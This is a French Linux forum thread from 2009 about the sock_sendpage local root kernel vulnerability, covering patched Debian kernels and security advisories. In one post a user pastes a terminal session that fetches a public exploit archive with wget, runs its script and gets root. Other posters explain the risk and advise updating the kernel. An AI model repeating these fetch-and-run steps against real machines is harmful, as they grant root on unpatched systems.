A tous, j’ai pensé que cette information vous intéresserait…
Je suis sûr que certains doit être au courant mais je préfèrerai faire cette piqure de rappel pour les autres
http://www.tux-planet.fr/linux-kernel-2-x-sock_sendpage-local-root-exploit/
A ceci près que cette faille n’est pas spécifique à la version 2.6.30 mais existe depuis les versions 2.4. On peut signaler que les mises à jour pour Debian stable (lenny) et oldstable (etch) ont été disponibles avant la publication des versions 2.6 stables du noyau officiel sur kernel.org. Bravo Debian, belle réactivité !
Salut,
Merci pour l’info, ça fait un peu froid dans le dos…
J’ai une question :
Ce genre de patch ne devrait pas être dans les dépôts Debian plutôt que distribué par tux-planet 
Il n’y a même pas de md5 ou de “protection” gpg… C’est de la parano de ma part
EDIT > Pardon, décidément… je n’avais pas vu le message de Pascal… < Edit
Quel patch ? Le truc téléchargé par wget dans la petite fenêtre ? Ce n’est pas un patch, c’est un “exploit” qui comme son nom l’indique exploite la faille et la met en évidence. Il est clair qu’on peut ne pas lui faire confiance et ne ne faire tourner que dans un bac à sable (machine de test ou machine virtuelle qui sera reformatée).
Comme déjà dit les noyaux patchés contre cette faille sont déjà dans les dépôts Debian stable et oldstable (pour testing et sid je ne sais pas), yaka faire la mise à jour.
Merci Debian :smt002
salut 
pas de panique cette faille ne s’exploite qu’en local. 
silicon.fr/fr/news/2009/08/1 … nerabilite
L’expert précise cependant que la faille ne peut être exploitée que localement, ce qui limite son champ d’action
Il suffit d’une faille non root exploitable à distance (rien que dans mozilla il y en a régulièrement, une faille dans un script PHP si c’est un serveur…) pour prendre pied sur la machine et exploiter une faille locale root. Sans parler d’un utilisateur malveillant ou simplement maladroit.
Pas de panique, vraiment…
[quote=“PascalHambourg”]Il suffit d’une faille non root exploitable à distance (rien que dans mozilla il y en a régulièrement, une faille dans un script PHP si c’est un serveur…) pour prendre pied sur la machine et exploiter une faille locale root. Sans parler d’un utilisateur malveillant ou simplement maladroit.
Pas de panique, vraiment…[/quote]
je retire mes dires et n’ecouterais plus aussi vite les experts… 
merci pour le conseil 
salut
j’ai fais comme indiquer dans tuxplanet
je voulais avoir votre avis , es ce que tout c’est bien passer ede mon coté ???
$ wget http://www.tux-planet.fr/public/hack/sock-sendpage-local-root-exploit.tar.gz
--2009-08-18 14:36:04-- http://www.tux-planet.fr/public/hack/sock-sendpage-local-root-exploit.tar.gz
Résolution de www.tux-planet.fr... 213.186.33.4
Connexion vers www.tux-planet.fr|213.186.33.4|:80...connecté.
requête HTTP transmise, en attente de la réponse...200 OK
Longueur: 4752 (4,6K) [text/html]
Saving to: `sock-sendpage-local-root-exploit.tar.gz'
100%[=======================================================================>] 4 752 --.-K/s in 0,04s
2009-08-18 14:36:04 (113 KB/s) - « sock-sendpage-local-root-exploit.tar.gz » sauvegardé [4752/4752]
$ tar zxvf sock-sendpage-local-root-exploit.tar.gz && cd sock-sendpage-local-root-exploit
sock-sendpage-local-root-exploit/
sock-sendpage-local-root-exploit/exploit.c
sock-sendpage-local-root-exploit/wunderbar_emporium.sh
sock-sendpage-local-root-exploit/pwnkernel.c
sock-sendpage-local-root-exploit$ chmod 755 wunderbar_emporium.sh
/sock-sendpage-local-root-exploit$ ./wunderbar_emporium.sh
[+] MAPPED ZERO PAGE!
[+] got ring0!
[+] detected 2.6 style 8k stacks
MPlayer dev-SVN-r29170Can't open joystick device /dev/input/js0: No such file or directory
Can't init input joystick
mplayer: could not connect to socket
mplayer: No such file or directory
Failed to open LIRC support. You will not be able to use your remote control.
Playing /tmp/video.yGxoui.
libavformat file format detected.
[lavf] Audio stream found, -aid 0
==========================================================================
Opening audio decoder: [pcm] Uncompressed PCM audio decoder
AUDIO: 48000 Hz, 2 ch, s16le, 64.0 kbit/4.17% (ratio: 8000->192000)
Selected audio codec: [pcm] afm: pcm (Uncompressed PCM)
==========================================================================
AO: [oss] 48000Hz 2ch s16le (2 bytes per sample)
Video: no video
Starting playback...
A: 0.0 (00.0) of 521.5 (08:41.4) ??,?%
Exiting... (End of file)
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
c’est cette ligne ,"[+] Disabled security of : nothing, what an insecure machine!" linux fais de l’humour noir ???
Je dirais que c’est parce que tu n’utilises pas SELinux
[quote=“Grhim”]j’ai fais comme indiquer dans tuxplanet
je voulais avoir votre avis , es ce que tout c’est bien passer ede mon coté ???[/quote]
Ça dépend de ce que tu entends par “bien”.
Apparemment ton noyau est vulnérable à la faille qui a été exploitée avec succès pour passer root par le truc que tu as téléchargé. Maintenant il ne reste plus qu’à mettre à jour le noyau pour boucher le trou.
[quote=“PascalHambourg”][quote=“Grhim”]j’ai fais comme indiquer dans tuxplanet
je voulais avoir votre avis , es ce que tout c’est bien passer ede mon coté ???[/quote]
Ça dépend de ce que tu entends par “bien”.
Apparemment que ton noyau est vulnérable à la faille qui a été exploitée avec succès pour passer root par le truc que tu as téléchargé. Maintenant il ne reste plus qu’à mettre à jour le noyau pour boucher le trou.[/quote] 
J’ai bien fait de m’abstenir…
@Grhim, tu as fait ça sur quelle machine ? Quel Kernel ? Quelle version de Debian ?
j’ai fais ça sur ma machine perso: knoppix-debian-sid kernel 2.6.24 QT 3.3.8b
alors pour etre sur de ne pas faire de betise car je n’ai jamais fais encore d’upgrade de noyau on passe par la ligne de commande sans etre sous kde ou puis-je le faire a partir de aptitude ou synaptic ??
EDIT : je suis passer via synaptic et tout semble ok : viewtopic.php?f=3&t=22440
Salut,
Quelques infos : h-online.com/open/Linux-kern … ews/114021
Debian et Fedora on déja réagit comme le disait PascalHambourg plus haut.
Si on essais lance le script sur sa machine pour vérifier si celle ci est vulnérable, est ce que l’exploit reste “ouvert”?
Est il actif le temps de la session??
En bref, quelles sont les risques si la vulnérabilité se révèlent positive??
[quote]Si on essais lance le script sur sa machine pour vérifier si celle ci est vulnérable, est ce que l’exploit reste “ouvert”?
Est il actif le temps de la session??
En bref, quelles sont les risques si la vulnérabilité se révèlent positive??
[/quote]
Surtout ne jamais lancer un exploit sur sa/ses machines à l’aveuglette, ça peut faire des ravages comme l’a montré le dernier (je crois) exploit ssh.
Tu peux virtualiser une image dans les mêmes conditions (kernel/distro/etc) que ta machine et voir, c’est mieux
[quote]Si on essais lance le script sur sa machine pour vérifier si celle ci est vulnérable, est ce que l’exploit reste “ouvert”?
Est il actif le temps de la session??
En bref, quelles sont les risques si la vulnérabilité se révèlent positive??[/quote]
j’ai demander plus de precisions sur le forum de l’hackademy et backtrack & a zataz on verras les reponses :smt003
Petite info’; les systèmes Android sont également touchés. Du moins ceux ayant un noyau < à Août 09.
C’est mieux de le préciser.
Bonjour,
Est-ce quelqu’un sait ou trouver une liste des noyaux Debian qui sont “patché” ou non vulnérables à cet “exploit” ?
Et merci
[quote=“lol”]Bonjour,
Est-ce quelqu’un sait ou trouver une liste des noyaux Debian qui sont “patché” ou non vulnérables à cet “exploit” ?
Et merci [/quote]
Pour Etch : debian.org/security/2009/dsa-1864
Pour Lenny : debian.org/security/2009/dsa-1862
Pour Squeeze : tu n’as pas trop le choix
Pour Sid : tu n’as pas trop le choix non plus